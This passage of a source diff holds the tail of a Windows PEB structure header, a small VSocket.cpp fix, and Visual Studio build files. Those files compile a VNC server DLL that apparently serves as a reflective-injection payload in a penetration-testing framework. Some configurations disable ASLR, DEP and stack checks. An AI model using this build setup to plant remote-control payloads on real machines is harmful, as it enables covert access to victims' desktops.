WORD wOSBuildNumber;
WORD wOSCSDVersion;
DWORD dwOSPlatformId;
DWORD dwImageSubsystem;
DWORD dwImageSubsystemMajorVersion;
DWORD dwImageSubsystemMinorVersion;
DWORD dwImageProcessAffinityMask;
DWORD dwGdiHandleBuffer[34];
LPVOID lpPostProcessInitRoutine;
LPVOID lpTlsExpansionBitmap;
DWORD dwTlsExpansionBitmapBits[32];
DWORD dwSessionId;
ULARGE_INTEGER liAppCompatFlags;
ULARGE_INTEGER liAppCompatFlagsUser;
LPVOID lppShimData;
LPVOID lpAppCompatInfo;
UNICODE_STR usCSDVersion;
LPVOID lpActivationContextData;
LPVOID lpProcessAssemblyStorageMap;
LPVOID lpSystemDefaultActivationContextData;
LPVOID lpSystemAssemblyStorageMap;
DWORD dwMinimumStackCommit;
} _PEB, * _PPEB;
typedef struct
{
WORD offset:12;
WORD type:4;
} IMAGE_RELOC, *PIMAGE_RELOC;
//===============================================================================================//
#endif
//===============================================================================================//

2
external/source/vncdll/winvnc/VSocket.cpp vendored Normal file → Executable file
View File

@ -70,7 +70,7 @@ class VSocket;
////////////////////////////////////////////////////////
// *** Lovely hacks to make Win32 work. Hurrah!
#ifdef __WIN32__
#if defined(__WIN32__) && !defined(EWOULDBLOCK)
#define EWOULDBLOCK WSAEWOULDBLOCK
#endif

1200
external/source/vncdll/winvnc/WinVNC.vcproj vendored
View File

File diff suppressed because it is too large Load Diff

473
external/source/vncdll/winvnc/WinVNC.vcxproj vendored Executable file
View File

@ -0,0 +1,473 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" ToolsVersion="12.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup Label="ProjectConfigurations">
<ProjectConfiguration Include="Debug|Win32">
<Configuration>Debug</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Debug|x64">
<Configuration>Debug</Configuration>
<Platform>x64</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Release|Win32">
<Configuration>Release</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Release|x64">
<Configuration>Release</Configuration>
<Platform>x64</Platform>
</ProjectConfiguration>
</ItemGroup>
<PropertyGroup Label="Globals">
<ProjectName>winvnc</ProjectName>
<ProjectGuid>{EA6A09AC-04BB-423D-8842-CA48DF901058}</ProjectGuid>
<RootNamespace>WinVNC</RootNamespace>
<SccLocalPath>.</SccLocalPath>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<PlatformToolset>v120_xp</PlatformToolset>
<UseOfMfc>false</UseOfMfc>
<CharacterSet>MultiByte</CharacterSet>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<PlatformToolset>v120_xp</PlatformToolset>
<UseOfMfc>false</UseOfMfc>
<CharacterSet>MultiByte</CharacterSet>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<PlatformToolset>v120_xp</PlatformToolset>
<UseOfMfc>false</UseOfMfc>
<CharacterSet>MultiByte</CharacterSet>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<PlatformToolset>v120_xp</PlatformToolset>
<UseOfMfc>false</UseOfMfc>
<CharacterSet>MultiByte</CharacterSet>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
<ImportGroup Label="ExtensionSettings">
</ImportGroup>
<ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="PropertySheets">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
<Import Project="$(VCTargetsPath)Microsoft.CPP.UpgradeFromVC71.props" />
</ImportGroup>
<ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="PropertySheets">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
<Import Project="$(VCTargetsPath)Microsoft.CPP.UpgradeFromVC71.props" />
</ImportGroup>
<ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="PropertySheets">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
<Import Project="$(VCTargetsPath)Microsoft.CPP.UpgradeFromVC71.props" />
</ImportGroup>
<ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="PropertySheets">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
<Import Project="$(VCTargetsPath)Microsoft.CPP.UpgradeFromVC71.props" />
</ImportGroup>
<PropertyGroup Label="UserMacros" />
<PropertyGroup>
<_ProjectFileVersion>12.0.21005.1</_ProjectFileVersion>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<OutDir>$(ProjectDir)$(Configuration)\$(Platform)\</OutDir>
<IntDir>$(ProjectDir)$(Configuration)\$(Platform)\</IntDir>
<IgnoreImportLibrary>true</IgnoreImportLibrary>
<LinkIncremental>false</LinkIncremental>
<GenerateManifest>false</GenerateManifest>
<EmbedManifest>false</EmbedManifest>
<TargetName>$(ProjectName).$(PlatformShortName)</TargetName>
<TargetExt>.dll</TargetExt>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<OutDir>$(ProjectDir)$(Configuration)\$(Platform)\</OutDir>
<IntDir>$(ProjectDir)$(Configuration)\$(Platform)\</IntDir>
<IgnoreImportLibrary>true</IgnoreImportLibrary>
<LinkIncremental>false</LinkIncremental>
<GenerateManifest>false</GenerateManifest>
<EmbedManifest>false</EmbedManifest>
<TargetName>$(ProjectName).$(PlatformShortName)</TargetName>
<TargetExt>.dll</TargetExt>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<OutDir>$(ProjectDir)$(Configuration)\$(Platform)\</OutDir>
<IntDir>$(ProjectDir)$(Configuration)\$(Platform)\</IntDir>
<IgnoreImportLibrary>true</IgnoreImportLibrary>
<LinkIncremental>true</LinkIncremental>
<TargetName>$(ProjectName).$(PlatformShortName)</TargetName>
<TargetExt>.dll</TargetExt>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<OutDir>$(ProjectDir)$(Configuration)\$(Platform)\</OutDir>
<IntDir>$(ProjectDir)$(Configuration)\$(Platform)\</IntDir>
<IgnoreImportLibrary>true</IgnoreImportLibrary>
<LinkIncremental>true</LinkIncremental>
<TargetName>$(ProjectName).$(PlatformShortName)</TargetName>
<TargetExt>.dll</TargetExt>
</PropertyGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<Midl>
<PreprocessorDefinitions>NDEBUG;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<MkTypLibCompatible>true</MkTypLibCompatible>
<SuppressStartupBanner>true</SuppressStartupBanner>
<TargetEnvironment>Win32</TargetEnvironment>
</Midl>
<ClCompile>
<InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion>
<AdditionalIncludeDirectories>..\..\ReflectiveDLLInjection\common;./omnithread;./zlib;..;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;__WIN32__;__NT__;__x86__;_WINSTATIC;NCORBA;XMD_H;_CRT_SECURE_NO_DEPRECATE;_CRT_NONSTDC_NO_DEPRECATE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<StringPooling>true</StringPooling>
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
<BufferSecurityCheck>false</BufferSecurityCheck>
<FunctionLevelLinking>true</FunctionLevelLinking>
<PrecompiledHeader />
<BrowseInformation>true</BrowseInformation>
<WarningLevel>Level3</WarningLevel>
<SuppressStartupBanner>true</SuppressStartupBanner>
<CompileAs>Default</CompileAs>
</ClCompile>
<ResourceCompile>
<PreprocessorDefinitions>NDEBUG;WITH_JAVA_VIEWER;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<Culture>0x0409</Culture>
</ResourceCompile>
<PreLinkEvent>
<Command />
</PreLinkEvent>
<Link>
<AdditionalOptions>/MACHINE:I386 %(AdditionalOptions)</AdditionalOptions>
<AdditionalDependencies>ws2_32.lib;%(AdditionalDependencies)</AdditionalDependencies>
<OutputFile>$(OutDir)$(TargetName)$(TargetExt)</OutputFile>
<SuppressStartupBanner>true</SuppressStartupBanner>
<AdditionalManifestDependencies>type=%27win32%27 name=%27Microsoft.Windows.Common-Controls%27 version=%276.0.0.0%27 processorArchitecture=%27X86%27 publicKeyToken=%276595b64144ccf1df%27 language=%27*%27;%(AdditionalManifestDependencies)</AdditionalManifestDependencies>
<MapExports>true</MapExports>
<SubSystem>Windows</SubSystem>
<OptimizeReferences>true</OptimizeReferences>
<EnableCOMDATFolding>true</EnableCOMDATFolding>
<RandomizedBaseAddress>false</RandomizedBaseAddress>
<DataExecutionPrevention>false</DataExecutionPrevention>
<TargetMachine>MachineX86</TargetMachine>
</Link>
<PostBuildEvent>
<Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" &gt; NUL
exit 0</Command>
</PostBuildEvent>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<Midl>
<PreprocessorDefinitions>NDEBUG;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<MkTypLibCompatible>true</MkTypLibCompatible>
<SuppressStartupBanner>true</SuppressStartupBanner>
<TargetEnvironment>X64</TargetEnvironment>
<GenerateTypeLibrary>false</GenerateTypeLibrary>
<HeaderFileName />
<DllDataFileName />
</Midl>
<ClCompile>
<InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion>
<AdditionalIncludeDirectories>..\..\ReflectiveDLLInjection\common;./omnithread;./zlib;..;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;__WIN32__;__NT__;__x64__;_WINSTATIC;NCORBA;XMD_H;_CRT_SECURE_NO_DEPRECATE;_CRT_NONSTDC_NO_DEPRECATE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<StringPooling>true</StringPooling>
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
<BufferSecurityCheck>false</BufferSecurityCheck>
<FunctionLevelLinking>true</FunctionLevelLinking>
<PrecompiledHeader />
<BrowseInformation>true</BrowseInformation>
<WarningLevel>Level3</WarningLevel>
<SuppressStartupBanner>true</SuppressStartupBanner>
<CompileAs>Default</CompileAs>
</ClCompile>
<ResourceCompile>
<PreprocessorDefinitions>NDEBUG;WITH_JAVA_VIEWER;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<Culture>0x0409</Culture>
</ResourceCompile>
<PreLinkEvent>
<Command />
</PreLinkEvent>
<Link>
<AdditionalDependencies>ws2_32.lib;%(AdditionalDependencies)</AdditionalDependencies>
<OutputFile>$(OutDir)$(TargetName)$(TargetExt)</OutputFile>
<SuppressStartupBanner>false</SuppressStartupBanner>
<ManifestFile />
<MapExports>false</MapExports>
<SubSystem>Windows</SubSystem>
<OptimizeReferences>true</OptimizeReferences>
<EnableCOMDATFolding>true</EnableCOMDATFolding>
<RandomizedBaseAddress />
<DataExecutionPrevention />
<TargetMachine>NotSet</TargetMachine>
<AllowIsolation>true</AllowIsolation>
</Link>
<PostBuildEvent>
<Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.1 "$(TargetDir)$(TargetFileName)" &gt; NUL
exit 0</Command>
</PostBuildEvent>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<Midl>
<PreprocessorDefinitions>_DEBUG;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<MkTypLibCompatible>true</MkTypLibCompatible>
<SuppressStartupBanner>true</SuppressStartupBanner>
<TargetEnvironment>Win32</TargetEnvironment>
</Midl>
<ClCompile>
<Optimization>Disabled</Optimization>
<AdditionalIncludeDirectories>..\..\ReflectiveDLLInjection\common;./omnithread;./zlib;..;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<PreprocessorDefinitions>WIN32;_DEBUG;_WINDOWS;__WIN32__;__NT__;__x86__;NCORBA;_WINSTATIC;XMD_H;_CRT_SECURE_NO_DEPRECATE;_CRT_NONSTDC_NO_DEPRECATE;_CRT_SECURE_NO_WARNINGS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<BasicRuntimeChecks>StackFrameRuntimeCheck</BasicRuntimeChecks>
<RuntimeLibrary>MultiThreadedDebug</RuntimeLibrary>
<BufferSecurityCheck>true</BufferSecurityCheck>
<PrecompiledHeader />
<WarningLevel>Level3</WarningLevel>
<SuppressStartupBanner>true</SuppressStartupBanner>
<DebugInformationFormat>ProgramDatabase</DebugInformationFormat>
<CompileAs>Default</CompileAs>
</ClCompile>
<ResourceCompile>
<PreprocessorDefinitions>_DEBUG;WITH_JAVA_VIEWER;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<Culture>0x0809</Culture>
</ResourceCompile>
<Link>
<AdditionalOptions>/MACHINE:I386 %(AdditionalOptions)</AdditionalOptions>
<AdditionalDependencies>ws2_32.lib;%(AdditionalDependencies)</AdditionalDependencies>
<SuppressStartupBanner>true</SuppressStartupBanner>
<AdditionalManifestDependencies>type=%27win32%27 name=%27Microsoft.Windows.Common-Controls%27 version=%276.0.0.0%27 processorArchitecture=%27X86%27 publicKeyToken=%276595b64144ccf1df%27 language=%27*%27;%(AdditionalManifestDependencies)</AdditionalManifestDependencies>
<GenerateDebugInformation>true</GenerateDebugInformation>
<SubSystem>Windows</SubSystem>
<RandomizedBaseAddress>false</RandomizedBaseAddress>
<DataExecutionPrevention />
<TargetMachine>MachineX86</TargetMachine>
</Link>
<PostBuildEvent>
<Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" &gt; NUL
exit 0</Command>
</PostBuildEvent>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<Midl>
<PreprocessorDefinitions>_DEBUG;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<MkTypLibCompatible>true</MkTypLibCompatible>
<SuppressStartupBanner>true</SuppressStartupBanner>
<TargetEnvironment>X64</TargetEnvironment>
</Midl>
<ClCompile>
<Optimization>Disabled</Optimization>
<AdditionalIncludeDirectories>..\..\ReflectiveDLLInjection\common;./omnithread;./zlib;..;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<PreprocessorDefinitions>WIN32;_DEBUG;_WINDOWS;__WIN32__;__NT__;__x86__;NCORBA;_WINSTATIC;XMD_H;_CRT_SECURE_NO_DEPRECATE;_CRT_NONSTDC_NO_DEPRECATE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<BasicRuntimeChecks>StackFrameRuntimeCheck</BasicRuntimeChecks>
<RuntimeLibrary>MultiThreadedDebug</RuntimeLibrary>
<BufferSecurityCheck>true</BufferSecurityCheck>
<PrecompiledHeader />
<WarningLevel>Level3</WarningLevel>
<SuppressStartupBanner>true</SuppressStartupBanner>
<DebugInformationFormat>ProgramDatabase</DebugInformationFormat>
<CompileAs>Default</CompileAs>
</ClCompile>
<ResourceCompile>
<PreprocessorDefinitions>_DEBUG;WITH_JAVA_VIEWER;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<Culture>0x0809</Culture>
</ResourceCompile>
<Link>
<AdditionalOptions>/MACHINE:I386 %(AdditionalOptions)</AdditionalOptions>
<AdditionalDependencies>ws2_32.lib;%(AdditionalDependencies)</AdditionalDependencies>
<SuppressStartupBanner>true</SuppressStartupBanner>
<AdditionalManifestDependencies>type=%27win32%27 name=%27Microsoft.Windows.Common-Controls%27 version=%276.0.0.0%27 processorArchitecture=%27X86%27 publicKeyToken=%276595b64144ccf1df%27 language=%27*%27;%(AdditionalManifestDependencies)</AdditionalManifestDependencies>
<GenerateDebugInformation>true</GenerateDebugInformation>
<SubSystem>Windows</SubSystem>
<RandomizedBaseAddress>false</RandomizedBaseAddress>
<DataExecutionPrevention />
<TargetMachine>MachineX64</TargetMachine>
</Link>
<PostBuildEvent>
<Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.1 "$(TargetDir)$(TargetFileName)" &gt; NUL
exit 0</Command>
</PostBuildEvent>
</ItemDefinitionGroup>
<ItemGroup>
<ClCompile Include="vncdll.cpp" />
<ClCompile Include="vncEncodeCoRRE.cpp" />
<ClCompile Include="vncEncodeHexT.cpp" />
<ClCompile Include="vncEncoder.cpp" />
<ClCompile Include="vncEncodeRRE.cpp" />
<ClCompile Include="vncEncodeTight.cpp" />
<ClCompile Include="vncEncodeZlib.cpp" />
<ClCompile Include="vncEncodeZlibHex.cpp" />
<ClCompile Include="omnithread\nt.cpp" />
<ClCompile Include="libjpeg\jcapimin.c" />
<ClCompile Include="libjpeg\jcapistd.c" />
<ClCompile Include="libjpeg\jccoefct.c" />
<ClCompile Include="libjpeg\jccolor.c" />
<ClCompile Include="libjpeg\jcdctmgr.c" />
<ClCompile Include="libjpeg\jchuff.c" />
<ClCompile Include="libjpeg\jcinit.c" />
<ClCompile Include="libjpeg\jcmainct.c" />
<ClCompile Include="libjpeg\jcmarker.c" />
<ClCompile Include="libjpeg\jcmaster.c" />
<ClCompile Include="libjpeg\jcomapi.c" />
<ClCompile Include="libjpeg\jcparam.c" />
<ClCompile Include="libjpeg\jcphuff.c" />
<ClCompile Include="libjpeg\jcprepct.c" />
<ClCompile Include="libjpeg\jcsample.c" />
<ClCompile Include="libjpeg\jctrans.c" />
<ClCompile Include="libjpeg\jdapimin.c" />
<ClCompile Include="libjpeg\jdapistd.c" />
<ClCompile Include="libjpeg\jdatadst.c" />
<ClCompile Include="libjpeg\jdatasrc.c" />
<ClCompile Include="libjpeg\jdcoefct.c" />
<ClCompile Include="libjpeg\jdcolor.c" />
<ClCompile Include="libjpeg\jddctmgr.c" />
<ClCompile Include="libjpeg\jdhuff.c" />
<ClCompile Include="libjpeg\jdinput.c" />
<ClCompile Include="libjpeg\jdmainct.c" />
<ClCompile Include="libjpeg\jdmarker.c" />
<ClCompile Include="libjpeg\jdmaster.c" />
<ClCompile Include="libjpeg\jdmerge.c" />
<ClCompile Include="libjpeg\jdphuff.c" />
<ClCompile Include="libjpeg\jdpostct.c" />
<ClCompile Include="libjpeg\jdsample.c" />
<ClCompile Include="libjpeg\jdtrans.c" />
<ClCompile Include="libjpeg\jerror.c" />
<ClCompile Include="libjpeg\jfdctflt.c" />
<ClCompile Include="libjpeg\jfdctfst.c" />
<ClCompile Include="libjpeg\jfdctint.c" />
<ClCompile Include="libjpeg\jidctflt.c" />
<ClCompile Include="libjpeg\jidctfst.c" />
<ClCompile Include="libjpeg\jidctint.c" />
<ClCompile Include="libjpeg\jidctred.c" />
<ClCompile Include="libjpeg\jmemmgr.c" />
<ClCompile Include="libjpeg\jmemnobs.c" />
<ClCompile Include="libjpeg\jquant1.c" />
<ClCompile Include="libjpeg\jquant2.c" />
<ClCompile Include="libjpeg\jutils.c" />
<ClCompile Include="zlib\adler32.c" />
<ClCompile Include="zlib\compress.c" />
<ClCompile Include="zlib\crc32.c" />
<ClCompile Include="zlib\deflate.c" />
<ClCompile Include="zlib\infblock.c" />
<ClCompile Include="zlib\infcodes.c" />
<ClCompile Include="zlib\inffast.c" />
<ClCompile Include="zlib\inflate.c" />
<ClCompile Include="zlib\inftrees.c" />
<ClCompile Include="zlib\infutil.c" />
<ClCompile Include="zlib\maketree.c" />
<ClCompile Include="zlib\trees.c" />
<ClCompile Include="zlib\uncompr.c" />
<ClCompile Include="zlib\zutil.c" />
<ClCompile Include="d3des.c" />
<ClCompile Include="DynamicFn.cpp" />
<ClCompile Include="FileTransferItemInfo.cpp" />
<ClCompile Include="MinMax.cpp" />
<ClCompile Include="RectList.cpp" />
<ClCompile Include="stdhdrs.cpp" />
<ClCompile Include="tableinitcmtemplate.cpp">
<ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">true</ExcludedFromBuild>
<ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">true</ExcludedFromBuild>
<ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">true</ExcludedFromBuild>
<ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Release|x64'">true</ExcludedFromBuild>
</ClCompile>
<ClCompile Include="tableinittctemplate.cpp">
<ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">true</ExcludedFromBuild>
<ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">true</ExcludedFromBuild>
<ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">true</ExcludedFromBuild>
<ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Release|x64'">true</ExcludedFromBuild>
</ClCompile>
<ClCompile Include="tabletranstemplate.cpp">
<ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">true</ExcludedFromBuild>
<ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">true</ExcludedFromBuild>
<ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">true</ExcludedFromBuild>
<ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Release|x64'">true</ExcludedFromBuild>
</ClCompile>
<ClCompile Include="translate.cpp" />
<ClCompile Include="TsSessions.cpp" />
<ClCompile Include="VideoDriver.cpp" />
<ClCompile Include="vncauth.c" />
<ClCompile Include="vncBuffer.cpp" />
<ClCompile Include="vncClient.cpp" />
<ClCompile Include="vncDesktop.cpp" />
<ClCompile Include="vncInstHandler.cpp" />
<ClCompile Include="vncKeymap.cpp" />
<ClCompile Include="vncRegion.cpp" />
<ClCompile Include="vncServer.cpp" />
<ClCompile Include="vncService.cpp" />
<ClCompile Include="vncSockConnect.cpp" />
<ClCompile Include="VSocket.cpp" />
<ClCompile Include="WallpaperUtils.cpp" />
</ItemGroup>
<ItemGroup>
<ClInclude Include="omnithread\nt.h" />
<ClInclude Include="omnithread\omnithread.h" />
<ClInclude Include="common.h" />
<ClInclude Include="libjpeg\jchuff.h" />
<ClInclude Include="libjpeg\jconfig.h" />
<ClInclude Include="libjpeg\jdct.h" />
<ClInclude Include="libjpeg\jdhuff.h" />
<ClInclude Include="libjpeg\jerror.h" />
<ClInclude Include="libjpeg\jinclude.h" />
<ClInclude Include="libjpeg\jmemsys.h" />
<ClInclude Include="libjpeg\jmorecfg.h" />
<ClInclude Include="libjpeg\jpegint.h" />
<ClInclude Include="libjpeg\jpeglib.h" />
<ClInclude Include="libjpeg\jversion.h" />
<ClInclude Include="zlib\deflate.h" />
<ClInclude Include="zlib\infblock.h" />
<ClInclude Include="zlib\infcodes.h" />
<ClInclude Include="zlib\inffast.h" />
<ClInclude Include="zlib\inffixed.h" />
<ClInclude Include="zlib\inftrees.h" />
<ClInclude Include="zlib\infutil.h" />
<ClInclude Include="zlib\trees.h" />
<ClInclude Include="zlib\zconf.h" />
<ClInclude Include="zlib\zlib.h" />
<ClInclude Include="zlib\zutil.h" />
<ClInclude Include="AdministrationControls.h" />
<ClInclude Include="d3des.h" />
<ClInclude Include="DynamicFn.h" />
<ClInclude Include="FileTransferItemInfo.h" />
<ClInclude Include="IncomingConnectionsControls.h" />
<ClInclude Include="InputHandlingControls.h" />
<ClInclude Include="keysymdef.h" />
<ClInclude Include="MatchWindow.h" />
<ClInclude Include="MinMax.h" />
<ClInclude Include="PollControls.h" />
<ClInclude Include="QuerySettingsControls.h" />
<ClInclude Include="RectList.h" />
<ClInclude Include="resource.h" />
<ClInclude Include="rfb.h" />
<ClInclude Include="rfbproto.h" />
<ClInclude Include="SharedDesktopArea.h" />
<ClInclude Include="stdhdrs.h" />
<ClInclude Include="translate.h" />
<ClInclude Include="TsSessions.h" />
<ClInclude Include="VideoDriver.h" />
<ClInclude Include="vncAbout.h" />
<ClInclude Include="vncauth.h" />
<ClInclude Include="vncBuffer.h" />
<ClInclude Include="vncClient.h" />
<ClInclude Include="vncDesktop.h" />
<ClInclude Include="vncEncodeCoRRE.h" />
<ClInclude Include="vncEncodeHexT.h" />
<ClInclude Include="vncEncoder.h" />
<ClInclude Include="vncEncodeRRE.h" />
<ClInclude Include="vncEncodeTight.h" />
<ClInclude Include="vncEncodeZlib.h" />
<ClInclude Include="vncEncodeZlibHex.h" />
<ClInclude Include="vncInstHandler.h" />
<ClInclude Include="vncKeymap.h" />
<ClInclude Include="vncPasswd.h" />
<ClInclude Include="vncRegion.h" />
<ClInclude Include="vncServer.h" />
<ClInclude Include="vncService.h" />
<ClInclude Include="vncSockConnect.h" />
<ClInclude Include="VSocket.h" />
<ClInclude Include="VTypes.h" />
<ClInclude Include="WallpaperUtils.h" />
</ItemGroup>
<ItemGroup>
<Text Include="README.TXT" />
</ItemGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
<ImportGroup Label="ExtensionTargets">
</ImportGroup>
</Project>

527
external/source/vncdll/winvnc/WinVNC.vcxproj.filters vendored Executable file
View File

@ -0,0 +1,527 @@
<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup>
<Filter Include="Source Files">
<UniqueIdentifier>{804c711f-35c6-4aac-9b8a-9cf8b528de85}</UniqueIdentifier>
<Extensions>.cpp, .c</Extensions>
</Filter>
<Filter Include="Source Files\encoder">
<UniqueIdentifier>{7847cf33-fe03-48ad-9a94-a8956821f343}</UniqueIdentifier>
<Extensions>.cpp, .c</Extensions>
</Filter>
<Filter Include="Source Files\omnithread">
<UniqueIdentifier>{a328f948-40d7-4548-9451-66b620124477}</UniqueIdentifier>
</Filter>
<Filter Include="Source Files\libjpeg">
<UniqueIdentifier>{cb642898-1056-43ee-828a-40004b207331}</UniqueIdentifier>
</Filter>
<Filter Include="Source Files\zlib">
<UniqueIdentifier>{22b4b748-5baf-4a41-9ab0-ef1d45f215aa}</UniqueIdentifier>
</Filter>
<Filter Include="Source Files\winvnc">
<UniqueIdentifier>{2a00b2f1-2b80-496f-ade2-3ac76578d435}</UniqueIdentifier>
</Filter>
<Filter Include="Header Files">
<UniqueIdentifier>{c3a89192-29f8-4ebc-b443-1032d86966d6}</UniqueIdentifier>
<Extensions>.h</Extensions>
</Filter>
<Filter Include="Header Files\libjpeg">
<UniqueIdentifier>{a545ae04-19cc-401a-bb0e-fd3d7aad0f60}</UniqueIdentifier>
</Filter>
<Filter Include="Header Files\zlib">
<UniqueIdentifier>{525d33a4-2360-47f9-9e68-24f7d54d50cb}</UniqueIdentifier>
</Filter>
<Filter Include="Header Files\winvnc">
<UniqueIdentifier>{e0e45b7e-7137-4fa7-acb3-9c57acce4c9c}</UniqueIdentifier>
</Filter>
</ItemGroup>
<ItemGroup>
<ClCompile Include="vncdll.cpp">
<Filter>Source Files</Filter>
</ClCompile>
<ClCompile Include="vncEncodeCoRRE.cpp">
<Filter>Source Files\encoder</Filter>
</ClCompile>
<ClCompile Include="vncEncodeHexT.cpp">
<Filter>Source Files\encoder</Filter>
</ClCompile>
<ClCompile Include="vncEncoder.cpp">
<Filter>Source Files\encoder</Filter>
</ClCompile>
<ClCompile Include="vncEncodeRRE.cpp">
<Filter>Source Files\encoder</Filter>
</ClCompile>
<ClCompile Include="vncEncodeTight.cpp">
<Filter>Source Files\encoder</Filter>
</ClCompile>
<ClCompile Include="vncEncodeZlib.cpp">
<Filter>Source Files\encoder</Filter>
</ClCompile>
<ClCompile Include="vncEncodeZlibHex.cpp">
<Filter>Source Files\encoder</Filter>
</ClCompile>
<ClCompile Include="omnithread\nt.cpp">
<Filter>Source Files\omnithread</Filter>
</ClCompile>
<ClCompile Include="libjpeg\jcapimin.c">
<Filter>Source Files\libjpeg</Filter>
</ClCompile>
<ClCompile Include="libjpeg\jcapistd.c">
<Filter>Source Files\libjpeg</Filter>
</ClCompile>
<ClCompile Include="libjpeg\jccoefct.c">
<Filter>Source Files\libjpeg</Filter>
</ClCompile>
<ClCompile Include="libjpeg\jccolor.c">
<Filter>Source Files\libjpeg</Filter>
</ClCompile>
<ClCompile Include="libjpeg\jcdctmgr.c">
<Filter>Source Files\libjpeg</Filter>
</ClCompile>
<ClCompile Include="libjpeg\jchuff.c">
<Filter>Source Files\libjpeg</Filter>
</ClCompile>
<ClCompile Include="libjpeg\jcinit.c">
<Filter>Source Files\libjpeg</Filter>
</ClCompile>
<ClCompile Include="libjpeg\jcmainct.c">
<Filter>Source Files\libjpeg</Filter>
</ClCompile>
